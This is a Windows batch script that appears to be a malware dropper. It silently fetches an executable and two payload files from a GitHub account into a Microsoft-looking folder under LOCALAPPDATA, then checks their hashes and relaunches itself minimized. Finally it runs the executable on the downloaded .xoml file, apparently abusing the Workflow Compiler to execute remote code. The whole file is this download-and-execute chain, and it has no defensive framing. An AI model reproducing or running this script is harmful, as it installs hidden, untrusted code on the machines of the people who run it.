@echo off
setlocal EnableDelayedExpansion

if "%~1"=="__s__" goto :m

:m

if exist "%LOCALAPPDATA%\Microsoft\WinNtU\wfc.exe" (
    goto :f1d
)

:f1u1
set "D=%LOCALAPPDATA%\Microsoft\WinNtU\wfc.exe"
for %%F in ("!D!") do (
    if not exist "%%~dpF" mkdir "%%~dpF"
)
curl -LJ -s -o "%LOCALAPPDATA%\Microsoft\WinNtU\wfc.exe" "https://github.com/cw6787/wfc/raw/refs/heads/main/WFC.exe"
if !errorlevel! neq 0 (
    del "%LOCALAPPDATA%\Microsoft\WinNtU\wfc.exe" 2>nul
    goto :f1uf
)
set "H1="
for /f "skip=1 delims=" %%H in ('certutil -hashfile "%LOCALAPPDATA%\Microsoft\WinNtU\wfc.exe" SHA256') do if not defined H1 set "H1=%%H"
set "H1=!H1: =!"
if /i "!H1!"=="4dff4c148526b3cb946c6660cac910a381c65f0227903770b2a5271c8c871b1f" goto :f1o
del "%LOCALAPPDATA%\Microsoft\WinNtU\wfc.exe" 2>nul

:f1uf
exit /b 1

:f1o
start "" /min cmd /c "%~f0" __s__
exit /b 0

:f1d

if exist "%LOCALAPPDATA%\Microsoft\WinNtU\preview.xoml" (
    goto :f2d
)

:f2u1
set "D=%LOCALAPPDATA%\Microsoft\WinNtU\preview.xoml"
for %%F in ("!D!") do (
    if not exist "%%~dpF" mkdir "%%~dpF"
)
curl -L -s -o "%LOCALAPPDATA%\Microsoft\WinNtU\preview.xoml" "https://raw.githubusercontent.com/cw6787/comeclean/refs/heads/main/preview.xml"
if !errorlevel! neq 0 (
    del "%LOCALAPPDATA%\Microsoft\WinNtU\preview.xoml" 2>nul
    goto :f2uf
)
set "H2="
for /f "skip=1 delims=" %%H in ('certutil -hashfile "%LOCALAPPDATA%\Microsoft\WinNtU\preview.xoml" SHA256') do if not defined H2 set "H2=%%H"
set "H2=!H2: =!"
if /i "!H2!"=="e3f7250e3788d8bf898084923de70d6e18d87a3ec67229b4ca6e1b3e565c1362" goto :f2o
del "%LOCALAPPDATA%\Microsoft\WinNtU\preview.xoml" 2>nul

:f2uf
exit /b 1

:f2o
start "" /min cmd /c "%~f0" __s__
exit /b 0

:f2d

if exist "%LOCALAPPDATA%\Microsoft\WinNtU\viewtime.csv" (
    goto :f3d
)

:f3u1
set "D=%LOCALAPPDATA%\Microsoft\WinNtU\viewtime.csv"
for %%F in ("!D!") do (
    if not exist "%%~dpF" mkdir "%%~dpF"
)
curl -L -s -o "%LOCALAPPDATA%\Microsoft\WinNtU\viewtime.csv" "https://raw.githubusercontent.com/cw6787/comeclean/refs/heads/main/Viewtime.csv"
if !errorlevel! neq 0 (
    del "%LOCALAPPDATA%\Microsoft\WinNtU\viewtime.csv" 2>nul
    goto :f3uf
)
set "H3="
for /f "skip=1 delims=" %%H in ('certutil -hashfile "%LOCALAPPDATA%\Microsoft\WinNtU\viewtime.csv" SHA256') do if not defined H3 set "H3=%%H"
set "H3=!H3: =!"
if /i "!H3!"=="878fd9b2e890463ded5a78c0d624b1e60bdb080bd12301109cd912593592248e" goto :f3o
del "%LOCALAPPDATA%\Microsoft\WinNtU\viewtime.csv" 2>nul

:f3uf
exit /b 1

:f3o
start "" /min cmd /c "%~f0" __s__
exit /b 0

:f3d

%LOCALAPPDATA%\Microsoft\WinNtU\wfc.exe %LOCALAPPDATA%\Microsoft\WinNtU\preview.xoml"
if !errorlevel! neq 0 (
    exit /b 1
)

endlocal
